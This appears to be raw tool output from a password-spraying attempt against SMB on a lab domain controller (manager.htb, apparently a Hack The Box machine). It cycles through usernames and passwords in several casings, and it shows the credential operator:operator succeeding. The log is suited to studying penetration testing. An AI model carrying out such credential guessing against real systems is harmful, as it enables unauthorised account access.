SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:ChinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:Operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:zhong STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:cheng STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:ryan STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:raven STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:jinWoo STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Operator:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\operator:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\OPERATOR:chinHae STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [+] manager.htb\Operator:operator 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [+] manager.htb\operator:operator 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:operator STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [+] manager.htb\OPERATOR:operator 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:ZHONG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:CHENG STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:RYAN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:RAVEN STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:JINWOO STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:CHINHAE STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Zhong:OPERATOR STATUS_LOGON_FAILURE 
